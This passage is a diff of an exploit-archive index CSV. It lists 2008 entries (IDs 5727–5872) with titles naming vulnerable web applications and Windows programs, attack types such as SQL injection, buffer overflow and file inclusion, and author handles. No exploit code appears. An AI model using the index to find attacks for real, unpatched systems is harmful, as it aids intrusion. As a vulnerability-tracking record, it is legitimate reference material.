+5727,platforms/windows/dos/5727.pl,"MDaemon 9.6.5 - Multiple Remote Buffer Overflow Exploit PoC",2008-06-02,securfrog,windows,dos,0 5728,platforms/php/webapps/5728.txt,"FlashBlog 0.31b Remote Arbitrary File Upload",2008-06-03,"ilker Kandemir",php,webapps,0 5729,platforms/php/webapps/5729.txt,"Joomla Component joomradio 1.0 - (id) SQL Injection",2008-06-03,His0k4,php,webapps,0 -5730,platforms/php/webapps/5730.txt,"Joomla Component iDoBlog <= b24 - Remote SQL Injection",2008-06-03,His0k4,php,webapps,0 -5731,platforms/php/webapps/5731.txt,"Battle Blog <= 1.25 - (comment.asp) Remote SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps,0 +5730,platforms/php/webapps/5730.txt,"Joomla Component iDoBlog b24 - SQL Injection",2008-06-03,His0k4,php,webapps,0 +5731,platforms/php/webapps/5731.txt,"Battle Blog 1.25 - (comment.asp) SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps,0 5732,platforms/windows/remote/5732.html,"C6 Messenger ActiveX Remote Download & Execute Exploit",2008-06-03,Nine:Situations:Group,windows,remote,0 5733,platforms/php/webapps/5733.txt,"quickersite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,php,webapps,0 5734,platforms/php/webapps/5734.pl,"Joomla Component JooBlog 0.1.1 - Blind SQL Injection Exploit",2008-06-03,His0k4,php,webapps,0 5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script - Code Execution",2008-06-03,JIKO,php,webapps,0 -5737,platforms/php/webapps/5737.pl,"Joomla Component jotloader <= 1.2.1.a - BlindSQL Injection Exploit",2008-06-04,His0k4,php,webapps,0 +5737,platforms/php/webapps/5737.pl,"Joomla Component jotloader 1.2.1.a - BlindSQL Injection Exploit",2008-06-04,His0k4,php,webapps,0 5738,platforms/windows/remote/5738.rb,"HP StorageWorks NSI Double Take Remote Overflow Exploit (Metasploit)",2008-06-04,ri0t,windows,remote,1100 -5739,platforms/php/webapps/5739.txt,"PHP-Address Book <= 3.1.5 - (SQL/XSS) Multiple Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 +5739,platforms/php/webapps/5739.txt,"PHP-Address Book 3.1.5 - (SQL/XSS) Multiple Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 5740,platforms/php/webapps/5740.pl,"Joomla Component EasyBook 1.1 - (gbid) SQL Injection Exploit",2008-06-04,ZAMUT,php,webapps,0 5741,platforms/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download Exploit",2008-06-04,cocoruder,windows,remote,0 5742,platforms/php/webapps/5742.txt,"427bb 2.3.1 - (SQL/XSS) Multiple Vulnerabilities",2008-06-05,"CWH Underground",php,webapps,0 -5743,platforms/php/webapps/5743.txt,"Joomla Component simpleshop <= 3.4 - SQL Injection",2008-06-05,His0k4,php,webapps,0 +5743,platforms/php/webapps/5743.txt,"Joomla Component simpleshop 3.4 - SQL Injection",2008-06-05,His0k4,php,webapps,0 5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 - (css_str) SQL Injection",2008-06-05,MustLive,php,webapps,0 -5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a (shownews) Remote SQL Injection",2008-06-05,anonymous,php,webapps,0 +5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a (shownews) SQL Injection",2008-06-05,anonymous,php,webapps,0 5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote BoF Exploit",2008-06-05,shinnai,windows,remote,0 5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote BoF Exploit (2)",2008-06-05,shinnai,windows,remote,0 5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate (user) SQL Injection",2008-06-05,His0k4,php,webapps,0 5749,platforms/multiple/dos/5749.pl,"Asterisk (SIP channel driver / in pedantic mode) Remote Crash Exploit",2008-06-05,"Armando Oliveira",multiple,dos,0 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - (BIDIB.ocx) Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0 5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Post Auth) Remote SEH Overflow Exploit",2008-06-06,ryujin,windows,remote,22 -5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ <= 4.0 - Remote SQL Injection",2008-06-07,His0k4,php,webapps,0 +5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0 5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection",2008-06-08,Zigma,asp,webapps,0 5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (LFI/XSS) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0 -5755,platforms/php/webapps/5755.pl,"Joomla Component yvcomment <= 1.16 - Blind SQL Injection Exploit",2008-06-08,His0k4,php,webapps,0 +5755,platforms/php/webapps/5755.pl,"Joomla Component yvcomment 1.16 - Blind SQL Injection Exploit",2008-06-08,His0k4,php,webapps,0 5756,platforms/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 - (filename) File Disclosure",2008-06-08,MEEKAAH,php,webapps,0 5757,platforms/php/webapps/5757.txt,"BrowserCRM 5.002.00 - (clients.php) Remote File Inclusion",2008-06-08,ahmadbady,php,webapps,0 5758,platforms/php/webapps/5758.txt,"Galatolo Web Manager 1.0 - XSS / Local File Inclusion",2008-06-08,StAkeR,php,webapps,0 -5759,platforms/php/webapps/5759.txt,"Joomla Component rapidrecipe Remote SQL Injection",2008-06-08,His0k4,php,webapps,0 -5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager <= 1.0 - Remote SQL Injection Exploit",2008-06-09,Stack,php,webapps,0 -5761,platforms/php/webapps/5761.pl,"iJoomla News Portal (Itemid) Remote SQL Injection Exploit",2008-06-09,"ilker Kandemir",php,webapps,0 +5759,platforms/php/webapps/5759.txt,"Joomla Component rapidrecipe SQL Injection",2008-06-08,His0k4,php,webapps,0 +5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager 1.0 - SQL Injection Exploit",2008-06-09,Stack,php,webapps,0 +5761,platforms/php/webapps/5761.pl,"iJoomla News Portal (Itemid) SQL Injection Exploit",2008-06-09,"ilker Kandemir",php,webapps,0 5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - (config.php) Local File Inclusion",2008-06-09,Stack,php,webapps,0 5763,platforms/asp/webapps/5763.txt,"real estate Web site 1.0 - (SQL/XSS) Multiple Vulnerabilities",2008-06-09,JosS,asp,webapps,0 5764,platforms/php/webapps/5764.txt,"telephone directory 2008 - (SQL/XSS) Multiple Vulnerabilities",2008-06-09,"CWH Underground",php,webapps,0 -5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - (article) Remote SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps,0 -5766,platforms/php/webapps/5766.txt,"realm CMS <= 2.3 - Multiple Vulnerabilities",2008-06-09,BugReport.IR,php,webapps,0 -5767,platforms/php/webapps/5767.php,"Flux CMS <= 1.5.0 - (loadsave.php) Remote Arbitrary File Overwrite Exploit",2008-06-09,EgiX,php,webapps,0 -5768,platforms/php/webapps/5768.txt,"pNews 2.08 - (shownews) Remote SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0 +5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - (article) SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps,0 +5766,platforms/php/webapps/5766.txt,"realm CMS 2.3 - Multiple Vulnerabilities",2008-06-09,BugReport.IR,php,webapps,0 +5767,platforms/php/webapps/5767.php,"Flux CMS 1.5.0 - (loadsave.php) Remote Arbitrary File Overwrite Exploit",2008-06-09,EgiX,php,webapps,0 +5768,platforms/php/webapps/5768.txt,"pNews 2.08 - (shownews) SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0 5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0 -5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0 -5771,platforms/php/webapps/5771.txt,"ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerabilities",2008-06-10,Unohope,php,webapps,0 -5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - (comments) Remote SQL Injection",2008-06-10,Unohope,php,webapps,0 +5770,platforms/php/webapps/5770.php,"Achievo 1.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0 +5771,platforms/php/webapps/5771.txt,"ErfurtWiki R1.02b (css) Local File Inclusion Vulnerabilities",2008-06-10,Unohope,php,webapps,0 +5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - (comments) SQL Injection",2008-06-10,Unohope,php,webapps,0 5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 - (XSS/SQL) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0 -5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - (index) Remote SQL Injection Vulnerabilities",2008-06-10,Unohope,php,webapps,0 -5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version (Topic_Id) - Remote SQL Injection",2008-06-10,JosS,php,webapps,0 -5776,platforms/php/webapps/5776.txt,"Experts (answer.php) 1.0.0 - Remote SQL Injection",2008-06-10,"CWH Underground",php,webapps,0 +5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - (index) SQL Injection Vulnerabilities",2008-06-10,Unohope,php,webapps,0 +5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version (Topic_Id) - SQL Injection",2008-06-10,JosS,php,webapps,0 +5776,platforms/php/webapps/5776.txt,"Experts (answer.php) 1.0.0 - SQL Injection",2008-06-10,"CWH Underground",php,webapps,0 5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin (BiAnno.ocx) Remote BoF Exploit",2008-06-10,shinnai,windows,remote,0 5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin (BiAnno.ocx) BoF Exploit (2)",2008-06-10,shinnai,windows,remote,0 5779,platforms/php/webapps/5779.txt,"syndeo CMS 2.6.0 - (LFI/XSS) Multiple Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0 5780,platforms/asp/webapps/5780.txt,"ASP Download 1.03 - Arbitrary Change Administrator Account",2008-06-10,Zigma,asp,webapps,0 5781,platforms/asp/webapps/5781.txt,"Todd Woolums ASP News Management 2.2 - SQL Injection Vulnerabiltiy",2008-06-10,Bl@ckbe@rD,asp,webapps,0 5782,platforms/php/webapps/5782.txt,"TNT Forum 0.9.4 - Local File Inclusion Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0 -5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar (board) Remote SQL Injection Exploit",2008-06-10,RMx,php,webapps,0 +5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar (board) SQL Injection Exploit",2008-06-10,RMx,php,webapps,0 5784,platforms/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusion Vulnerabilities",2008-06-11,"CWH Underground",php,webapps,0 -5785,platforms/php/webapps/5785.txt,"eFiction 3.0 - (toplists.php list) Remote SQL Injection",2008-06-11,Mr.SQL,php,webapps,0 +5785,platforms/php/webapps/5785.txt,"eFiction 3.0 - (toplists.php list) SQL Injection",2008-06-11,Mr.SQL,php,webapps,0 5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add-Admin Exploit",2008-06-11,"CWH Underground",php,webapps,0 5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Remote Blind SQL Injection",2008-06-11,"CWH Underground",php,webapps,0 5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injection Vulnerabilities",2008-06-11,BugReport.IR,php,webapps,0 @@ -5415,111 +5415,111 @@ id,file,description,date,author,platform,type,port 5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC validation error Remote Authentication Bypass Exploit",2008-06-12,"Maurizio Agazzini",multiple,remote,161 5791,platforms/php/webapps/5791.txt,"gravity board x 2.0 beta - (SQL/XSS) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC Multiple Local File Inclusion Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 -5793,platforms/windows/remote/5793.html,"muvee autoProducer <= 6.1 - (TextOut.dll) ActiveX Remote BoF Exploit",2008-06-12,Nine:Situations:Group,windows,remote,0 -5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - (results.php) Remote SQL Injection Exploit",2008-06-12,anonymous,php,webapps,0 -5795,platforms/windows/remote/5795.html,"XChat <= 2.8.7b (URI Handler) Remote Code Execution Exploit (ie6/ie7)",2008-06-13,securfrog,windows,remote,0 +5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - (TextOut.dll) ActiveX Remote BoF Exploit",2008-06-12,Nine:Situations:Group,windows,remote,0 +5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - (results.php) SQL Injection Exploit",2008-06-12,anonymous,php,webapps,0 +5795,platforms/windows/remote/5795.html,"XChat 2.8.7b (URI Handler) Remote Code Execution Exploit (ie6/ie7)",2008-06-13,securfrog,windows,remote,0 5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection Exploit",2008-06-12,TheDefaced,php,webapps,0 5797,platforms/php/webapps/5797.txt,"butterfly organizer 2.0.0 - (SQL/XSS) Multiple Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0 5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin Exploit",2008-06-13,"CWH Underground",php,webapps,0 -5799,platforms/php/webapps/5799.pl,"Mambo Component galleries 1.0 - (aid) Remote SQL Injection Exploit",2008-06-13,Houssamix,php,webapps,0 +5799,platforms/php/webapps/5799.pl,"Mambo Component galleries 1.0 - (aid) SQL Injection Exploit",2008-06-13,Houssamix,php,webapps,0 5800,platforms/php/webapps/5800.pl,"Butterfly Organizer 2.0.0 - Arbitrary Delete (Category/Account) Exploit",2008-06-13,Stack,php,webapps,0 5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - (section) Local File Inclusion",2008-06-13,Loader007,php,webapps,0 -5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - (tsk_id) Remote SQL Injection",2008-06-13,"Virangar Security",php,webapps,0 -5803,platforms/php/webapps/5803.txt,"Pre News Manager <= 1.0 - (index.php id) SQL Injection",2008-06-13,K-159,php,webapps,0 -5804,platforms/php/webapps/5804.txt,"Pre Ads Portal <= 2.0 - Remote SQL Injection",2008-06-13,K-159,php,webapps,0 -5805,platforms/asp/webapps/5805.txt,"E-SMART CART (productsofcat.asp) Remote SQL Injection",2008-06-13,JosS,asp,webapps,0 +5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - (tsk_id) SQL Injection",2008-06-13,"Virangar Security",php,webapps,0 +5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - (index.php id) SQL Injection",2008-06-13,K-159,php,webapps,0 +5804,platforms/php/webapps/5804.txt,"Pre Ads Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0 +5805,platforms/asp/webapps/5805.txt,"E-SMART CART (productsofcat.asp) SQL Injection",2008-06-13,JosS,asp,webapps,0 5806,platforms/php/webapps/5806.pl,"GLLCTS2 - (listing.php sort) Remote Blind SQL Injection Exploit",2008-06-13,anonymous,php,webapps,0 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO (JobSearch3.php) SQL Injection",2008-06-13,JosS,php,webapps,0 -5808,platforms/php/webapps/5808.txt,"Mambo <= 4.6.4 - (Output.php) Remote File Inclusion",2008-06-13,irk4z,php,webapps,0 -5809,platforms/php/webapps/5809.txt,"Pre Job Board (JobSearch.php) Remote SQL Injection",2008-06-14,JosS,php,webapps,0 +5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - (Output.php) Remote File Inclusion",2008-06-13,irk4z,php,webapps,0 +5809,platforms/php/webapps/5809.txt,"Pre Job Board (JobSearch.php) SQL Injection",2008-06-14,JosS,php,webapps,0 5810,platforms/php/webapps/5810.txt,"contenido 4.8.4 - (RFI/XSS) Multiple Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 -5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple Remote SQL Injection Vulnerabilities",2008-06-14,"CWH Underground",php,webapps,0 -5812,platforms/php/webapps/5812.txt,"PHPMyCart (shop.php cat) Remote SQL Injection",2008-06-14,anonymous,php,webapps,0 +5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injection Vulnerabilities",2008-06-14,"CWH Underground",php,webapps,0 +5812,platforms/php/webapps/5812.txt,"PHPMyCart (shop.php cat) SQL Injection",2008-06-14,anonymous,php,webapps,0 5813,platforms/php/webapps/5813.txt,"Shoutcast Admin Panel 2.0 - (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Remote Memory Consumption Exploit (post auth)",2008-06-14,"Praveen Darshanam",linux,dos,0 5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - (prodId) Remote Blind SQL Injection Exploit",2008-06-14,anonymous,php,webapps,0 5816,platforms/php/webapps/5816.pl,"DIY (index_topic did) Blind SQL Injection Exploit",2008-06-14,Mr.SQL,php,webapps,0 -5817,platforms/windows/dos/5817.pl,"Dana IRC <= 1.3 - Remote Buffer Overflow PoC",2008-06-14,t0pP8uZz,windows,dos,0 -5818,platforms/php/webapps/5818.txt,"xeCMS <= 1.0.0 RC2 Insecure Cookie Handling",2008-06-14,t0pP8uZz,php,webapps,0 -5819,platforms/php/webapps/5819.txt,"ezcms <= 1.2 - (bSQL/admin byapss) Multiple Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0 -5820,platforms/php/webapps/5820.txt,"PHPEasyNews <= 1.13 RC2 - (post) Remote SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0 -5821,platforms/php/webapps/5821.txt,"AlstraSoft AskMe Pro <= 2.1 - Multiple SQL Injection Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0 +5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow PoC",2008-06-14,t0pP8uZz,windows,dos,0 +5818,platforms/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 Insecure Cookie Handling",2008-06-14,t0pP8uZz,php,webapps,0 +5819,platforms/php/webapps/5819.txt,"ezcms 1.2 - (bSQL/admin byapss) Multiple Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0 +5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - (post) SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0 +5821,platforms/php/webapps/5821.txt,"AlstraSoft AskMe Pro 2.1 - Multiple SQL Injection Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0 5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a (currentfile) Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0 -5823,platforms/php/webapps/5823.txt,"AWBS <= 2.7.1 - (news.php viewnews) Remote SQL Injection",2008-06-15,Mr.SQL,php,webapps,0 +5823,platforms/php/webapps/5823.txt,"AWBS 2.7.1 - (news.php viewnews) SQL Injection",2008-06-15,Mr.SQL,php,webapps,0 5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 - (change.php) Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps,0 -5826,platforms/php/webapps/5826.py,"Simple Machines Forum <= 1.1.4 - Remote SQL Injection Exploit",2008-06-15,The:Paradox,php,webapps,0 +5826,platforms/php/webapps/5826.py,"Simple Machines Forum 1.1.4 - SQL Injection Exploit",2008-06-15,The:Paradox,php,webapps,0 5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow Exploit",2008-06-15,Heretic2,windows,remote,4000 -5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 - (repquote) Remote SQL Injection",2008-06-15,anonymous,php,webapps,0 +5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 - (repquote) SQL Injection",2008-06-15,anonymous,php,webapps,0 5829,platforms/php/webapps/5829.txt,"SH-News 3.0 Insecure Cookie Handling",2008-06-15,"Virangar Security",php,webapps,0 -5830,platforms/php/webapps/5830.txt,"NiTrO Web Gallery <= 1.4.3 - (section) Remote SQL Injection",2008-06-16,Mr.SQL,php,webapps,0 -5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS <= 0.22 - (lang) Local File Inclusion",2008-06-16,DSecRG,php,webapps,0 +5830,platforms/php/webapps/5830.txt,"NiTrO Web Gallery 1.4.3 - (section) SQL Injection",2008-06-16,Mr.SQL,php,webapps,0 +5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS 0.22 - (lang) Local File Inclusion",2008-06-16,DSecRG,php,webapps,0 5832,platforms/php/webapps/5832.pl,"MyMarket 1.72 - BlindSQL Injection Exploit",2008-06-16,anonymous,php,webapps,0 5833,platforms/php/webapps/5833.txt,"Joomla Simple Shop Galore Component 3.x - (catid) SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection Exploit",2008-06-17,Mr.SQL,php,webapps,0 -5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 - (index.php Id) Remote SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5836,platforms/php/webapps/5836.txt,"BaSiC-CMS - (index.php r) Remote SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 - (index.php Id) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5836,platforms/php/webapps/5836.txt,"BaSiC-CMS - (index.php r) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer - dne2000.sys kernel ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0 -5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 - (index.php page) Remote SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 - (tid) Remote SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0 -5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - (detail.php id) Remote SQL Injection",2008-06-17,anonymous,php,webapps,0 +5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 - (index.php page) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 - (tid) SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0 +5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - (detail.php id) SQL Injection",2008-06-17,anonymous,php,webapps,0 5841,platforms/php/webapps/5841.txt,"ThaiQuickCart (sLanguage) Local File Inclusion",2008-06-17,"CWH Underground",php,webapps,0 -5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 - (index.php page) Remote SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 - (index.php page) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5843,platforms/windows/dos/5843.html,"P2P Foxy Out of Memory Denial of Service Exploit",2008-06-17,Styxosaurus,windows,dos,0 5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0 5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 Final Insecure Cookie Handling",2008-06-17,Stack,php,webapps,0 -5846,platforms/php/webapps/5846.txt,"eroCMS <= 1.4 - (index.php site) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5846,platforms/php/webapps/5846.txt,"eroCMS 1.4 - (index.php site) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 - (includedir) Remote File Inclusion",2008-06-17,Cr@zy_King,php,webapps,0 5848,platforms/php/webapps/5848.txt,"traindepot 0.1 - (LFI/XSS) Multiple Vulnerabilities",2008-06-18,"CWH Underground",php,webapps,0 -5849,platforms/asp/webapps/5849.txt,"doITlive CMS <= 2.50 - (SQL Injection/XSS) Multiple Vulnerabilities",2008-06-18,BugReport.IR,asp,webapps,0 +5849,platforms/asp/webapps/5849.txt,"doITlive CMS 2.50 - (SQL Injection/XSS) Multiple Vulnerabilities",2008-06-18,BugReport.IR,asp,webapps,0 5850,platforms/php/webapps/5850.txt,"AspWebCalendar 2008 - Remote File Upload",2008-06-18,Alemin_Krali,php,webapps,0 5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 vb6skit.dll Buffer Overflow PoC",2008-06-18,shinnai,windows,dos,0 5852,platforms/php/webapps/5852.txt,"netBIOS (showNews.php newsid) SQL Injection",2008-06-18,"security fears team",php,webapps,0 -5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 - (categori) Remote SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 +5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 - (categori) SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 5854,platforms/php/webapps/5854.txt,"Mybizz-Classifieds (index.php cat) SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 -5855,platforms/php/webapps/5855.txt,"Easy Webstore 1.2 - (index.php postid) Remote SQL Injection",2008-06-18,Mr.SQL,php,webapps,0 -5856,platforms/php/webapps/5856.txt,"nweb2fax <= 0.2.7 - Multiple Vulnerabilities",2008-06-18,dun,php,webapps,0 -5857,platforms/php/webapps/5857.txt,"Carscripts Classifieds (index.php cat) Remote SQL Injection",2008-06-18,Stack,php,webapps,0 +5855,platforms/php/webapps/5855.txt,"Easy Webstore 1.2 - (index.php postid) SQL Injection",2008-06-18,Mr.SQL,php,webapps,0 +5856,platforms/php/webapps/5856.txt,"nweb2fax 0.2.7 - Multiple Vulnerabilities",2008-06-18,dun,php,webapps,0 +5857,platforms/php/webapps/5857.txt,"Carscripts Classifieds (index.php cat) SQL Injection",2008-06-18,Stack,php,webapps,0 5858,platforms/php/webapps/5858.txt,"BoatScripts Classifieds (index.php type) SQL Injection",2008-06-18,Stack,php,webapps,0 5859,platforms/php/webapps/5859.txt,"eLineStudio Site Composer (ESC) <= 2.6 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 5860,platforms/php/webapps/5860.txt,"ownrs blog beta3 - (SQL/XSS) Multiple Vulnerabilities",2008-06-19,"CWH Underground",php,webapps,0 -5861,platforms/php/webapps/5861.txt,"Academic Web Tools CMS <= 1.4.2.8 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 -5862,platforms/php/webapps/5862.txt,"samart-cms 2.0 - (contentsid) Remote SQL Injection",2008-06-19,dun,php,webapps,0 -5863,platforms/php/webapps/5863.txt,"CMS-BRD (menuclick) Remote SQL Injection",2008-06-19,dun,php,webapps,0 +5861,platforms/php/webapps/5861.txt,"Academic Web Tools CMS 1.4.2.8 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 +5862,platforms/php/webapps/5862.txt,"samart-cms 2.0 - (contentsid) SQL Injection",2008-06-19,dun,php,webapps,0 +5863,platforms/php/webapps/5863.txt,"CMS-BRD (menuclick) SQL Injection",2008-06-19,dun,php,webapps,0 5864,platforms/php/webapps/5864.txt,"Orlando CMS 0.6 - Remote File Inclusion Vulnerabilities",2008-06-19,Ciph3r,php,webapps,0 -5865,platforms/php/webapps/5865.txt,"CaupoShop Classic 1.3 - (saArticle[ID]) Remote SQL Injection",2008-06-19,anonymous,php,webapps,0 +5865,platforms/php/webapps/5865.txt,"CaupoShop Classic 1.3 - (saArticle[ID]) SQL Injection",2008-06-19,anonymous,php,webapps,0 5866,platforms/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 - Remote File Inclusion Vulnerabilities",2008-06-19,Ciph3r,php,webapps,0 5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - (cate_id) SQL Injection",2008-06-19,"Hussin X",php,webapps,0 -5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - (id) Remote SQL Injection",2008-06-19,"Hussin X",php,webapps,0 -5869,platforms/php/webapps/5869.txt,"virtual support office-xp <= 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 -5870,platforms/php/webapps/5870.txt,"gl-sh deaf forum <= 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 +5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - (id) SQL Injection",2008-06-19,"Hussin X",php,webapps,0 +5869,platforms/php/webapps/5869.txt,"virtual support office-xp 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 +5870,platforms/php/webapps/5870.txt,"gl-sh deaf forum 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - (index.php page) Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 - (index.php page) Local File 